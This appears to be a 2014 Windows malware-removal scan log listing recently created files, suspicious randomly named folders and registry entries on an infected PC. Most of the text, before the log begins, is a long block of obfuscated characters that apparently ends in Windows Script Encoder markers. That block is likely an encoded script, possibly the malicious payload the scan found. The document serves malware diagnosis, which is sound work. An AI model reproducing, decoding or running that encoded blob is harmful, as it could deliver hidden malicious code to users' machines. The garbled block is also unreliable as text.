h56+^t(g2sb#T}2.sFd4!}SrpVm^:DW\+D\luB"jssNC`.oq(KFHAsd\2xL}:9|tf49K0#YmF.b8 IIjZt2.VB2rpN;i!w&#sjl9#\5sNNP`sujjjl.ytAts9ZC IyC+\k4q4x\KV;io.K4^s9N3B`jUw~P:D}6ojMm"s"}!wbiZ9fIgsIs9_#:XL}jw2#V9+qB((C.Mii1.I^2Xl"tj?"swCDAiP&*lqB~.UNV ^wuqkOI4`*+#V^CPjx(6 ^K4jtwU.9_^3FK.sIt.T27pswN8X ijhKssGpqtkn:t U3O&.j9o[f5hj.x9i g.psHfm!14 #I2jws2KVo_.osw]!xjha3HT[G}osK}s1ogs~A.`sM6T&nswZ}ijrmy(y::6:} Y$}Zw5pVtAVtqn.wEt/O14iBWKh6w]`.ajfjs4w.A629v]C~rji\?mwVX92Ibn!oX5s*jl!1`ph6n]:tX\hO:p#t&.#sU]8s mj\ZH`9G]V\3^sar ix5I8t\\ssq8qq.lw96jh]o.p}N8:XAeU4AIptAlsH2^8Vim29&N8}` V9MnxjI8u9jlw2 IVNV#3Nqjswt.s#G5qNq]jq6 O}.r1xlftI}UY]5(~9N^V"].wni3a ep^r4VBxtssN8PsK?j9hV2yI%sU]&aK^fjAH3o_rp1miy6953jrN^1oH(~Xix4htpgS4AoxgsV. t&mZN9.TBA.isa\jw9CpaAI94GmT2W82}smK~xj`/W^!w3}!OH#iw&IG4x:j27Cp}~?.VBK9$dNTs2tj^q\3OW+Ps mT2S}o}P\2wxIG9a82wfnMO(ii0&N:oA"js ji}q`/q4T#5p#s~]FwA]iw2I [A.is7}`sHj\:.y,Si.wx]M4rtowW4VVy\yt\tf1~506t HjjpoZP!8si/DwK%o~IoV+ijN$mxj1p0st}:9A](aEt"I ?ZBk(36j}qA7jV*]I3oM.h6jijjYi#wfpr1"|T*~nA1fqj^xp`qZC24S]:4I#V\fp^tp5?,$est7H.9A1T#~}"V~J 4(isgfK9BdNTsG^Z1f5j^WIH%.#3A*C.xA]%T!IwsD\.2Z]qHX4st$j"$h4+Y"ijj;#i\rN3sdmfV2jot$5!w|H:V8[VT }Ljs63w.js#nC.2}iN21sIe.qoK1ft~Hx"WHsw.|THGpi9S}Nofjj^9m0Yaex9v\.~fif9q?0ox"Z,`ni9 K0topioVph1;P!"f}i9Lp B~pi}b[Z925j9s5ZVwe!g1]y4An!4sp`oM5VAj\#1~?At!.#B~.ssgt gfCiwZ?#tVjsstn0.q5j"AK01MCC\L\FA tqj;jq12"fb8[ 9or_I94T22pP}x]F~*} Osl+]titwP099(sw3_A P ^ t!wIeV9/l0ox`CV [!IlpN1!H"ol?PAw}yA6e+8&.#2o1 wwt2A$5:lcKjw"CCjl\Fx\ owZH`]I1MwA#q3y.`,"}qt!5 F`}jjf}+9|j 4 5T2S]ww;:x9}lj9We 9DnV&y6#4lwsD`Mw8#Vs~5:sBjf[^ 1~j.wA#ix|I9#.? Ng]w2zq3IcN2tG#L"ZPgj p9ZNsBYqxAm[Ts~50F$?TH.p *o\K"y og&pi[ pP9}Ps,rjjw|pq6l]swA\2x(jhXlH.s/qstnCVI+.^IF4ss8}pIg]fxf]qw14#so4!Y5#qNU\MXf_tM 39l8!wAPi^sHA1C}(wVjist.w9/4+]&jisN]MO Pu^+VA.Iis~jA*+q:l?H8VIjjwl#x4;eV9M+s\Xj3sNnuN24GArIf]I5TIg]3Wh}Pjr.3t}ji1j]`,#:K^rpZVlij".PVwwjVgII:)FUjIM}TcSl2wKIooWjV.M]3ls\94L4uH2phtb} tqV49K0smC&^pt3wqi#j9p`12m&NgCT3SKwI$pi1jKV9t#sxw a}piaj?P1h]jsT`."xpj9$#Kj1]MtFi#"x1jB2jK3S]"pXN89$4!}y4qV~j3wY#%49H a+}91K\oAB9FaKVN; xt!]3DC]%\*.0oq2Yq6#3H?:t}?o4DIiF\PVaf\ a2.oVW.i.d}Z*VU!xKj:AS 2gs\y~DP39rNV2IjLsmtsssj9/m+Blp%1bH:O5}igZ!a8#Ng\V.(URhj`%X\f9M}kOI]u9*4VOLgM.V iIVN2WT.3ogphYs]V9}Pj&49soIssGi`9fIL~cHZ9"j:Ol jj1j#gr4w2*:xNb8oVIrA}pp+42pV1GtL0\jiwA?%45SzY;[GI%g:8;NZs"}jxft(xA}hlwj8t&5yN~iis;r:t"pVaU+ N2i2T\]h9\pj0MSz,AJZp-d&IcpU%MJXO2J!5\JfI\SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SH1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H0\}227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 dX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX%7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7J"t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[r%7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7S2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJf92S.^\}sbWi/%MSH%*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25-STo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSz12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z07r327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7I;,3Sz1ySz,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z%7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7Jy4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[kR\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\Jf92S"^7robWi;%.d&92S.m76szciZRDJf92S.^\}sbWi/%MS2N3S"^7robWiZRDJzRcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfI\STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&Sz12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z07r327FH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\]/O2Sz1ySz,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z%7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7J.t$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[b%-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-d&92S.m76szciZRDJf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.dXRcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&I\SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SH,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H%762A\FXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,yJXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXR\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\Jy4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[kR\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\Jf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJzRcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfI\SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SH1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H0\}227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 dX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX%7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7J"t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[r%7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7S2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJf92S.^\}sbWi/%MSH%*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25-STo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSz12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z07r327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7I;,3Sz1ySz,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z%7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7Jy4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[kR\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\Jf92S"^7robWi;%.d&92S.m76szciZRDJf92S.^\}sbWi/%MS2N3S"^7robWiZRDJzRcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfI\STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&Sz12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z07r327FH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\]/O2Sz1ySz,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z%7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7J.t$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[b%-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-d&92S.m76szciZRDJf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.dXRcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&I\SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SH,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H%762A\FXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,yJXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXR\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\Jy4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[kR\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\Jf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJzRcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfI\SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SH1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H0\}227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 d&N~i/,yS2m-Nz071z,~iZO Jf1\Nz1WNht"i..$`3wANZIat O3}!w1j3wArA1AgMV_Cs9_KAs$.#] 4TYACC9S]h9I?q$;1oNnC0s$\FwC}yN_PM4\j!jW\owf}8]V`2s"}qIwjsB}qsM?V9"8j4Zi 9C}"]"p+tx]`N2(FwApj9d]3j?^F~At+9Wpq1L`3N"H3,w?qNo}+1oKhV2e!g2H!9s}"t4p+t7P`9$9FwMpj9d 2g|]!8;HowMpqBCUM3Z6otMNZsP}+[ I t\^!4Z}iwC}+1gp+WZ8`s/1sw2p^sGP3jCCM9L#3\Ip`2A9 sn}Tsh?AHTpis N+sdCfjCtTx&.i]GpjY4i`.]5j82p0s4} 4\]!9W[Tw2p0o\F.xPi} 1Vs\p [~IhNx#j4W ijnl3oG?+NUt`YU\!DCj`tj}j"&Pj"AtfjS}8oC"j9xjTw;Nys!pP]"IiI2j!gxi#j|p+[Xjis2}`N2`gMpot7}j8\P!\pt"xrI:].5jt 8qA;I_mqKT4a1u.~C!^xPixI.T#$p+N~PZ1dMjIp`s7]x~ACjgq 9I48oF::VgCTs_N2}/Ih42p NN\&\*J"4L}/12pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5.~2jjV jjwA}jwA}iwAp`oqV9\tT62HANBpz1}phV~t!wA}iwApio~pisatA}25(\vjjV jj`h#!^f}iwAp`oA5js~}i14HwNBpTB}IhV~t&a? 99pio~pis~}`s$5jD5j^V jjZh#!^f]VlMl`ox5js~}is~p`s$ppilIhV~Cs"? 995"$o?i1~}`s$5jwAp`s~]M&h#!^fj3lMl`owjs9\tTV~p`s$pio~pis~ifg? 99l"$o?i1tP0}259Ap`s~}jwA}jwAj9^|l`owV9\tT3SHwNBpTo~pis~}jwA}iwA|"$D?i1}P0}25avj^V jjwA}jwA}iwAp`oC`s1\tT3WHwNBpqB}IhV~t!wA}iwApio~piss[Aw25Djj^V jjwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~]:a? 9|m%$o?i1~}`s$5japj^V jjwA}jwA]iwApq[A5js~}i1WHwNBpTo~pis~P\? 99pio~pi28[A}259Ap`s~}jkh8j^f}iwAp`of(V1\tTV~p`s$p#HZ?hV~t!wA}iwZN"$D?i1~}`s$5j^;j8V jjwA}jwA}iwAp`oA5js~}is~p`s$pio~pVtm sxre%x?H B_.VV\#...I39p0s~}jw?\VIh#i4|N^Vh":Ymj3wk5.1Hp#\S.s1`CF\1Ppa9N#Bw+3F~].jAq39cmZ6Dixgk}jwA}i9MHV(Xm!sq\iFl_wH+iaDjU1b}jxjiTjcooqpVwt8j9"I3wAp`sVPL~L82Whe+Dspjeh(2,:#P.V.0Hql+B_NTs~}jx|ehl?4!HD1 60]`*Xq.9rm^}IjxgIijxK#ijrj8t2`(.m]ft.p`s$p#tI.UAm]jl* s9MHo2qKh6N w}dI:l?mwVo[!wt#ywW %x4yBq5(.m]ft.p`s$p#3Hl!6\\x"jto16KssIpUNm#89uI.9c4AsV}V"I#3x|P!D?Kj]A5js~] Ik}Ajal!H&ph6m].aheV9KqsoH 6q[Z9 jK~j89jH.9H8.xyeVwAp`os:xVm#T5S^. N ]D4uVb\Lj! s1FHooD+u}\\ 1$`.j?.8sq}3a1n3^F V9cmZoA5jsj8#}!j:9*Nh\H.V6m MDAe%xc43q+?p.m]2t"5jwApj2H6jak8She#9Mmyo51M6~]TI7p`s$pioV}T}![!^A}i^yNT37pp92jo5.qxAypNI~njX*]3g!j"4xIG4}93Vq\i}nlqY]1iB7}T.g sTXCP^tKuGMl!1~}`s$qMX\m NxC!j1^VwIj"^Am sj93YNn stHss*pV2519oyjs4*iP"ppVBdH362jVNu:y4|+N.^^!9A62W!\f9ppZdc:!wU[UwHHo.Upio~pisIH24qCsz\Sz02IuAX^sVr59Apo2Mt!wA}jwA#Tw.5Zox5j2yipNGp`s/.hVM+ip2}VgS} X}+%sMP.0iqVFjM\f?`s\8fADP.aMJf9AjV4F:j9~}i9`.NI/rj12pTYA]2Kh]3^hIiq ?32yijI$g2wI?2Vwej"ltVwACi`y|Z}&q357HuplpZ1+13075qA H3wZ}iwfIps"|TwV[Z.$5j^ZrU,2}!Xq]2Kh}P4qm0B9UMW7J"t5p`.4phtsli9G}jwACjO!+Vs}?u5l^ZF/\2xKpNj7624A}jw263^q?V[I5js~jiqXS2N(ms\Zj!*sF&"MtzD1Iu[^r31 F21$\2"3KVIGt2X3}V\Hto"SpNi\dX,~[T1}}AI$ph[N}39U}jwAH%TDp%i7r/,~}`1/f~sI`s~}31 n29ZHjRcIAoA5jpWj#A&jq.q+h^M5z,UH2&*Jf9ZH3H"|"1&]A6/gx9jm0IAiMxl8&gLP Oqlb1&}2s~}j/Hjs5.p ]sr39~J!gH[""p}T}Zj9IA\8s!mV\xIG}+C29xtxI\]u9Apq]Am3qy[q1AN2t\mVGZp%37[!&h]o^yIiq.?!,;}8o-d&9Ap:}2i.~![Fw*ihRX`#I"js~] s;|2t$pVo"p%AIHC"MFTg ?!40N9A"82pX}2wp?VVq\&gw\Kt!C 9;S8B:m227\91.l`sf}h]^|TY`tL9XjV^Zrj12p#AZC_NX\2Ahj_IMi(^Ae!4X}V8q}ZBA9VVa\"HZl:AeNz0S9Ia}x1!iUI*I%s}I!t \.HA5!^WKb, F!8Y[L1\JzD!?0Tc5KIUt%3SI:IAIiqy+VNUtL4Ajh\&pio~I3qZ}j}ugx9c4q3Si(0Dn.4A]u9Ap:$V5!pZ 9tA+`3aIiH"li}2jsw(Cp9&+ VXH"Ia\.1f\y~51A9xi29Z]^|]3&*H:txny9UtrYt.wsUmUsANUtAH2^WJfI\SqLXNi6Utstsg9I`sh8VjHKt*n3"6};1K\!9~}is~I`s$piotphV~t!wA}ixApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}KZ,(r0Gf}Gxq.a8 p"tVDN(Ub08&z,\fk1/L0W8H*1&I^8j*UNq*Tl q^SVV![MjX8f~K}pByl 1^^H*HI(xylVskpKKv] j!]!j/}q[t9M.V8f9VNq*%N!s74sA7Cl!tp&W|![4q!Y^^s*s(ftXSsIk8Z~C(x![ w/j_B\9M.N[/3k|VNVq3)KT9l[Mj4p#Z/q#x4Up.\^!dqFj94 p.\VZ/ Fj98U5yH^ONo?3TFoYx4 I}NuB9|j3aF?l98U\\l+iK9ubkB_b;:MjE}2IKJf~cHfz/B!Oh|:d1;o3K q1lm2Is4jXUN *ZC8VJV^EN!#H4fA:to9+mgVmH*ge(xyCMw/pPKvIy#!"M.kt N4NV.!4fBVN *N[M^\8s~\l XZ}pqKFVN4&Cjy}oq.\kl38MSo}+w/4w[w(:I7[qAH4y1$|jAK}+pT}Z44}U^!}#O9(j6(} VT\.DN(U6(#j^E[ftXpjX4.`sE9fHHpj6(.`V;N9\H(j3TFsD98U"pNuB9|j3aFU*B(x\\lyjKBCz/BCz/\/ShSG)w}h!nW}!n5ysT5+LgZU/g/xZ1/Ug/} #S|92a6S!F\(4wNG/{v#*#Ei@#@&77'lc]E `w3E~k6,^nx-lmJS!Bq#p@#@&7)@#@&7^mY^tvn*@#@&i @#@&d)@#@&N@#@&msWk+cbpuq0qAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-10-08 to 2014-11-08  )))))))))))))))))))))))))))))))
.
.
2014-11-08 21:22 . 2014-11-08 21:22 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-11-08 17:42 . 2014-11-08 17:45 -------- d-----w- C:\FRST
2014-11-08 06:34 . 2014-11-08 06:34 39464 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{663C1E5C-F5CB-4675-B9F2-69A490CE2832}\MpKsl4d4a1af2.sys
2014-11-08 02:02 . 2014-11-08 02:02 -------- d-----w- c:\programdata\NeseVdol
2014-11-08 02:02 . 2014-11-08 02:02 -------- d-----w- c:\programdata\UehaLwahi
2014-11-07 09:43 . 2014-11-07 09:43 62576 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{663C1E5C-F5CB-4675-B9F2-69A490CE2832}\offreg.dll
2014-11-07 06:50 . 2014-11-07 06:50 114904 ----a-w- c:\windows\system32\drivers\2E8A529B.sys
2014-11-07 04:18 . 2014-09-17 07:35 908840 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{B4775F75-8211-4724-B45F-4A210E549B66}\gapaengine.dll
2014-11-07 04:14 . 2014-10-14 20:13 8901368 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{663C1E5C-F5CB-4675-B9F2-69A490CE2832}\mpengine.dll
2014-11-05 21:37 . 2014-11-05 21:37 -------- d-----w- c:\programdata\VenqIxjeh
2014-11-05 21:36 . 2014-11-05 21:36 -------- d-----w- c:\programdata\KupoqIkavk
2014-11-05 07:34 . 2014-11-05 15:32 -------- d-----w- c:\users\Jack\AppData\Roaming\Ismyihci
2014-11-05 07:33 . 2014-11-07 06:53 -------- d-----w- c:\programdata\CimhAyoj
2014-11-05 07:33 . 2014-11-07 06:53 -------- d-----w- c:\programdata\LukucOkjav
2014-11-04 04:05 . 2014-11-05 15:32 -------- d-----w- c:\users\Jack\AppData\Roaming\Waanypi
2014-11-04 04:04 . 2014-11-04 04:04 -------- d-----w- c:\programdata\FunhEmnol
2014-11-04 04:03 . 2014-11-04 04:03 -------- d-----w- c:\programdata\ZixvOfbax
2014-11-01 06:16 . 2014-11-02 03:15 -------- d-----w- c:\programdata\MuztOnba
2014-11-01 06:15 . 2014-11-02 03:15 -------- d-----w- c:\programdata\UabcIzedk
2014-11-01 03:45 . 2014-11-01 06:16 -------- d-----w- c:\users\Jack\AppData\Roaming\FrameworkUpdate7
2014-11-01 03:45 . 2014-11-02 06:10 -------- d-----w- C:\b11f30c
2014-10-31 10:26 . 2014-10-14 20:13 8901368 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2014-10-31 02:12 . 2014-10-31 02:12 -------- d-----w- C:\TDSSKiller_Quarantine
2014-10-31 00:31 . 2014-10-31 02:16 -------- d-----w- c:\programdata\Malwarebytes' Anti-Malware (portable)
2014-10-29 13:01 . 2014-10-29 13:01 -------- d-----w- c:\windows\Microsoft Antimalware
2014-10-27 07:04 . 2014-06-27 01:45 2285056 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-10-26 23:01 . 2014-10-29 14:02 -------- d-----w- c:\users\Jack\AppData\Roaming\Tyfyukbe
2014-10-26 09:12 . 2014-02-04 02:04 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-10-26 09:10 . 2013-11-23 18:26 417792 ----a-w- c:\windows\system32\WMPhoto.dll
2014-10-26 09:08 . 2014-09-19 00:44 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-10-26 09:08 . 2014-06-24 02:59 1987584 ----a-w- c:\windows\system32\d3d10warp.dll
2014-10-26 09:08 . 2013-11-26 08:16 3419136 ----a-w- c:\windows\system32\d2d1.dll
2014-10-25 17:45 . 2014-10-25 17:45 -------- d-sh--w- c:\users\Jack\AppData\Local\EmieUserList
2014-10-25 17:45 . 2014-10-25 17:45 -------- d-sh--w- c:\users\Jack\AppData\Local\EmieSiteList
2014-10-25 16:49 . 2014-10-25 16:49 -------- d-----w- c:\windows\ERUNT
2014-10-25 13:05 . 2014-10-25 13:05 9728 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-10-25 11:54 . 2014-10-25 11:54 17344 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-10-25 11:53 . 2014-10-25 11:53 -------- d-----w- c:\users\Jack\AppData\Roaming\GlarySoft
2014-10-25 11:53 . 2014-10-25 11:53 -------- d-----w- c:\users\Jack\AppData\Roaming\DiskDefrag
2014-10-25 11:53 . 2014-11-07 03:25 -------- d-----w- c:\program files\Glary Utilities 5
2014-10-15 07:33 . 2014-10-10 01:44 230912 ----a-w- c:\windows\system32\generaltel.dll
2014-10-15 07:33 . 2014-10-10 01:44 396288 ----a-w- c:\windows\system32\aepdu.dll
2014-10-15 07:33 . 2014-10-10 01:39 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-10-15 07:33 . 2014-09-29 00:41 2379264 ----a-w- c:\windows\system32\win32k.sys
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-11-07 06:50 . 2014-04-06 13:16 114904 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-31 00:30 . 2014-04-06 13:13 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-10-30 11:24 . 2013-11-25 16:49 229000 ------w- c:\windows\system32\MpSigStub.exe
2014-10-01 15:11 . 2014-04-06 13:13 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-10-01 15:11 . 2013-11-25 17:14 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-09-29 20:13 . 2014-09-29 20:13 31744 ----a-w- c:\windows\system32\drivers\netfilter.sys
2014-09-25 01:40 . 2014-10-01 06:24 519680 ----a-w- c:\windows\system32\qdvd.dll
2014-09-23 21:40 . 2013-11-26 03:47 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-23 21:40 . 2013-11-26 03:47 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-17 07:35 . 2014-04-08 07:11 908840 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll
2014-09-09 21:47 . 2014-09-23 22:37 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-23 01:46 . 2014-08-27 21:55 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-22 21:10 . 2014-08-22 21:10 21480 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Offline Scanner\FilesList32.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt1"]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
